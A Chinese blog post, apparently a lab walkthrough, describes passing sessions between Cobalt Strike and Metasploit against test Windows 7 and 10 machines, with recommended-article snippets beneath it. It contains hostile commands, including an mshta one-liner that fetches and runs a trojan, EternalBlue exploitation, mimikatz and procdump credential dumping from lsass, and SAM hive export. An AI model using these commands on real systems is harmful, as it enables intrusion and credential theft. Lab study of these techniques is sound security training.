CS和msf的权限传递,利用mimikatz抓取win10明文密码

已于 2024-07-01 14:12:40 修改
阅读量1.1k 收藏 9
点赞数 17
文章标签: 安全
于 2024-06-02 17:52:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65810417/article/details/139372982
版权

一、Cobaltstrike的安装

   http://t.csdnimg.cn/yhZin

   安装CobaltStrike,浏览博主的上篇文章即可!!!

这里我在自己的本机win11上执行了Client去连接kali中的Server端,直接执行.cmd文件即可!!!

二、攻击环境

        攻击机:kali-2024   ip:192.168.223.152

        靶机: win10           ip:192.168.223.144

                    win7             ip:192.168.223.153

三、cs和msf权限传递过程

                1.cs监听器的使用

                        第一个监听器:要使win10上线cs,就先用cs生成html-application类型的木马,并且生成一个网址,使其在win10中的命令行中运行   

在win10上执行此命令即可使其中马,前提是保证win10可以ping通kali,保证其防火墙和杀毒软件都已经关闭,否则会直接将木马文件清除 

mshta cs上生成的文件网址

                2.生成木马,使靶机上线

执行成功后,可见win10在cs上上线成功!

       cs和msf联动

                cs会话传至msf上

首先启动msfconsole工具

 新建一个外部监听,端口号不冲突即可!!!

 利用msf中的exploit中的multi/handler这个模块,设置本机ip和端口号

 会话传至成功!

 成功后,就有了查看上线靶机的ip地址等信息的权限,使用ipconfig即可

                msf会话传至cs上
                        利用永恒之蓝漏洞上线win7

同样是利用msf中的永恒之蓝的这个模块,上线win7

 攻击win7成功!!!

设置监听器,和cs1操作相同

使用windows/local/payload_inject模块 

会话传递成功!!!

四、mimikatz抓取win10的明文密码

原理

Mimikatz是一个强大的工具,可以用来读取Windows系统中的凭证信息。它能够抓取明文密码的原理主要是通过直接与Windows的安全子系统进行交互,包括LSASS(Local Security Authority Subsystem Service)进程,该进程负责本地安全和登录。

应用场景:

1、密码破解

2、提权攻击

3、域控制器攻击

4、认证绕过

5、传递哈希攻击

Mimikatz提供了一系列命令,可以用来与LSASS进程通信,提取存储的登录凭证。主要命令如下:

  1. sekurlsa::logonpasswords:列出当前登录会话的密码。

  2. sekurlsa::searchpasswords:搜索存储在系统中的密码。

  3. sekurlsa::minidump:从内存dump中提取凭证。

使用Mimikatz抓取明文密码的步骤如下:

  1. 获取Mimikatz的执行权限。

  2. 使用相应的Mimikatz命令获取明文密码。

环境

windows10专业版

操作过程

下载mimikatz工具,选择自己系统的型号即可!!

 管理员权限下修改注册表,修改成功会有以下提示,接着重启系统

管理员身份运行

privilege::debug    调试权限

 

繁星日月
关注
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4420
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
红队攻防之从边界突破到漫游内网(无csmsf)
HBohan的博客
12-03 1923
前言 网络安全的本质:懂进攻,知防守,先正向,后逆向。 本篇文章目录 网络拓扑图: 本次红队攻防实战所需绘制的拓扑图如下: 边界突破 访问网站: http://xxx.xxx.xxx/?id=1 首页如下: SQL注入拿shell 构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径 使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中 http://xxx.xxx.xxx/?id=1 and 1=2 un
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7216
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
mimkatz获取windows10明文密码
banliyaoguai的博客
05-31 1261
在Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码mimikatz通过注入代码到操作系统的内存中,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
Win10系统中用mimikatz抓取明文密码
weixin_42558965的博客
03-22 4236
实验环境 :Windows10专业版 参考了网上的方法,发现大部分都是抄的 https://blog.csdn.net/netsec_steven/article/details/107257325 这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤 这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且
csmsf权限传递,以及mimikatz抓取win10明文密码
最新发布
sgg236的博客
06-26 350
2,.生成木马 3.生成木马之后,将生成的木马程序拖到window2012,然后运行程序,发现目标已经上线 4.上线之后就可以对目标主机的操控 5.拿下权限CS权限传递msf1、建立监听器 2、在kali打开msf,开启msfconsole 2、调用 exploit/multi/handler 模块,将监听的ip地址与端口设置为在cs上建立监听保持一致。 3、然后进行传递 最后,返回msf就可以看到传递成功 msf权限1、在msfvenom生成木马 2、使用msfconsole启动Metasploi
procdump + mimikatz 获取window10系统密码的方法
onlyfunboy的专栏
06-17 1304
1,管理员权限打开cmd,进入对应目录 procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件 2,管理员权限打开mimikatz.exe 执行privilege::debug; 3,管理员权限打开cmd,进入对应目录 把lsass.dmp放在mimikatz目录利用 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit .
win10及win2012之后系统的明文抓取方式
聚鼎安全
03-29 3597
原文地址:https://www.anquanke.com/post/id/175364 抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.c...
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2805
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 364
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
获取Windows明文密码mimikatz_trunk_2.2.0_20190512.7z
07-07
Windows明文密码获取工具mimikatz_trunk_2.2.0_20190512.7z
procdump32_64+mimikatz.rar
06-15
procdump32_64 mimikatz,测试可以用,获取系统的密码信息。
密码提取神器 mimikatz 现已支持Windows 10 RS2
weixin_34077371的博客
09-19 4454
本文讲的是密码提取神器 mimikatz 现已支持Windows 10 RS2,昨天稍早,安全研究者@gentilkiwi 在推特上宣布,知名密码提取工具mimikatz推出v2.1.1新版,正式支持Windows 10 RS2(1707)。 mimikatz是由C语言编写的开源小工具,于2014年4月发起。它的功能非常强大,支持从Windows系统...
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2392
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
轻量级调试器神器 - mimikatz
Yatere的天平秤
03-08 2811
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
内网渗透之mimikatz+procdump 提取 Windows 明文密码
Adminxe的博客
05-05 3399
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。 0x01 操作 Windows10/2012 以下的版本: 1、上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2、拿到 mimika...
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6978
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
mimikatz抓取windows明文密码csmsf权限传递
m0_65540912的博客
05-25 604
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)这里注销就需要进行强制锁屏,因为是远程,锁屏需要借助脚本来进行,我这里就直接用电脑锁屏演示一下能否抓取明文。修改注册表之后,需注销用户,重新登录才能生效,才能抓取明文
网络安全:绕过MSF的一次渗透测试
wangluoanquan111的博客
12-25 765
这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 网站, 配置有宝塔WAF用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了网上有通杀payload,写shell的过程在这里省略了1、网络安全学习路线 2、电子书籍(白帽子) 3、安全大厂内部视频 4、100份src文档 5、常见安全面试题 6、ctf大赛经典题目解析 7、全套工具包 8、应急响应笔记。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值